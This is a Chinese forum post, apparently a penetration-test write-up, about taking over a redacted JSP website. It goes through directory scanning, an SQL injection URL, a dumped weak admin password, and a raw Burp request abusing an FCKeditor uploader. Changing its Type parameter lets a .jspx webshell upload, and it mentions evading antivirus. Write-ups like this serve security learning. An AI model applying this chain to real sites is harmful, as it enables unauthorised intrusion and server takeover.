渗透思路页面源代码查看

这个网站已经关闭，改版过，经授权测试。

御剑直接扫目录

扫描后台：http://www.XXXX.cn/admin

随便一找就是注入点 http://www.XXXX.cn/list.jsp?classid=17

跑数据 账号admin 密码123456 一顿操作猛如虎，一看密码123456

直接登录进入

然后发现后台被阉割了，找不到上传地址什么的。但是用御剑扫目录扫到了fck ===========================

脑子一闪，从源代码查看一下，通过源码里面的一些链接找到线索。

然后点击那个超链接直接跳转到文章编辑的页面http://www.XXXX.cn/admin/index.jsp?mFrm=leftmenu4.jsp 因为之前就扫到是fck的编辑器，ok，直接添加图片，burp上传

POST /FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image&colId=1&cid=1 HTTP/1.1 Host: www.lXXX.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://www.XXX.cn/FCKeditor/editor/dialog/fck_image.html Cookie: JSESSIONID=A924385CB65ABA03EC6898D6552B5D7B DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------14887232939352 Content-Length: 194 -----------------------------14887232939352 Content-Disposition: form-data; name="NewFile"; filename="bbbb.jpg" Content-Type: image/jpeg 111 -----------------------------14887232939352-- 但是这里又出现毛病发现上传jsp TXT都提示成功 但是访问都404 思考一小时，观察上传路径：

/FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image&colId=1&cid=1 发现上传的目录是type=image 考虑设置了image目录只能上传图片 然后把type改为file 成功上传 但是必须是jspx的马儿 jsp被GG掉，原因不明 总结：

前面跑数据，扫后台都是常规操作，没亮点。

亮点一、通过查看源码找到阉割之前的上传按钮 亮点二、上传成功但是不能执行，直接被杀，分析是不是上传目录问题，要不就是马儿不免杀，被杀软杀了。因为这两个问题在渗透测试中很常见。

作者：吹皱一池春水 （文章转载请注明来自：IT同路人论坛）